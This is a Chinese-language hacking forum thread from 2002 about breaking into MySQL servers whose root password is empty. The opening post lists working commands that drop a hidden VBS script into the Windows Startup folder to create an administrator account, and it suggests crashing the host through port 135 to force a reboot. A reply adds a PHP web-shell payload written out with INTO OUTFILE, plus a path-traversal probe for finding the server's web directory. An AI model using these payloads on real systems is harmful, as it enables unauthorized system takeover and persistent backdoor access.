>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  MYSQL用户ROOT密码为空又一攻击方法(转贴)
发表文章 发表涂鸦
  回复数:6  点击数:269 将此页发给您的朋友        
作者 主题: MYSQL用户ROOT密码为空又一攻击方法(转贴) 回复 | 收藏 | 打印 | 篇末
henyfei帅哥哦
级别:中级站友
威望:0
经验:0
货币:64
体力:17.3
来源:61.167.244.*
总发帖数:41
注册日期:2002-03-16
查看 邮件 主页 QQ 消息 引用 复制 下载 

前天,我发了一张关于MYSQL用户ROOT密码为空的贴,在网上我也找到一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??
后来,自己思索想到一个办法,在我测试的几台有此漏洞的机中均获得了成功,现将我的攻击方法公布如下:

1、连接到对方MYSQL 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中
2、让我们来看看服务器中有些什么数据库
mysql>show databases;
MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test;
我们将会进入test数据库中
4、查看我们进入数据库中有些什么数据表
mysql>show tables;
默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
6、在表中插入内容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
7、好了,现在我们来看看表a中有些什么
mysql>select * from a;
我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
8、输出表为一个VBS的脚本文件
mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";
我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“\"符号。
9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。


编辑 删除 发表时间发表于 2002-12-08.18:29:01   MSIE 5.01 Windows 2000IP: 已记录
czh帅哥哦
级别:精灵
威望:0
经验:3
货币:647
体力:54.9
来源:218.244.85.*
总发帖数:435
注册日期:2002-01-21
查看 邮件 主页 QQ 消息 引用 复制 下载 

把原帖地写出来啊
----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑 删除 发表时间发表于 2002-12-08.20:36:49   MSIE 6.0 Windows 2000IP: 已记录
布衣美女哟
级别:圣骑士
威望:0
经验:9
货币:504
体力:99
来源:61.174.203.*
总发帖数:147
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

这个后门不好. 又得重启,网管可不是白痴
有了一个system用户,但服务器如果没有ipc$,ftp,也不行啊
我喜欢写一个cmd.php脚本后门,再去拿system也行
----------------------------------------------------------
~~~飞天小猪~~~~嘟嘟嘟~~~~~~~~

编辑 删除 发表时间发表于 2002-12-10.09:21:34   MSIE 5.0 Windows 98IP: 已记录
指间沙帅哥哦
级别:圣骑士
威望:0
经验:4
货币:671
体力:80.6
来源:211.92.39.*
总发帖数:181
注册日期:2002-03-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

你的cmd.php给我们一个怎么样啊
----------------------------------------------------------
为中华帝国崛起而奋斗!!!!!!

编辑 删除 发表时间发表于 2002-12-27.13:54:38   MSIE 5.01 Windows 2000IP: 已记录
布衣美女哟
级别:圣骑士
威望:0
经验:9
货币:504
体力:99
来源:218.0.72.*
总发帖数:147
注册日期:2002-01-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

use test;
create table tmp(cmd TEXT);
insert into tmp values('<body onload=document.form1.cmd.focus()><?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd > temp.dat\");}?><style type=\"text/css\"><!\-\- .form1 {BACKGROUND: #FFFFFF; BORDER-BOTTOM: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; COLOR: #3c464f; FONT-SIZE: 9pt; clip: rect( ); cursor: text; height: auto; width: auto; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px\-\-></style><p class=\"title2\"> </p><form name=\"form1\" method=\\"post\" action=\"/cmd2.php\"> <input type=\"text\" name=\"cmd\" size=\"50\" class=\"form1\"></form><form name=\"form2\" method=\"post\" action=\"\"> <p> <textarea name=\"text\" cols=\"120\" rows=\"50\" class=\"form1\"><?if(isset($cmd)){readfile(\"temp.dat\");unlink(\"temp.dat\");}?></textarea> </p></form></body>');
select * from tmp into outfile 'c:\\PATH\\cmd2.php';
drop table tmp;

如果表tmp存在,就改一下如 tmp1.....

server的物理path可以通过php的一些bug来找到,,
仔细点。。一个一个试。。。 方法是 http://ip/member.php/../../
----------------------------------------------------------
~~~飞天小猪~~~~嘟嘟嘟~~~~~~~~

编辑 删除 发表时间发表于 2002-12-30.16:19:29   MSIE 5.0 Windows 98IP: 已记录
睡眼朦胧帅哥哦
级别:精灵
威望:0
经验:78
货币:745
体力:100
来源:其它
总发帖数:297
注册日期:2002-08-22
查看 邮件 主页 QQ 消息 引用 复制 下载 

很好啊,你从那里找来的

编辑 删除 发表时间发表于 2002-12-30.23:50:37   MSIE 6.0 Windows 98IP: 已记录
快乐着帅哥哦
级别:侠客
威望:0
经验:5
货币:198
体力:73.1
来源:广东
总发帖数:26
注册日期:2002-10-01
查看 邮件 主页 QQ 消息 引用 复制 下载 

MS SQL 内行不行

编辑 删除 发表时间发表于 2002-12-31.00:41:55   MSIE 6.0 Windows XPIP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题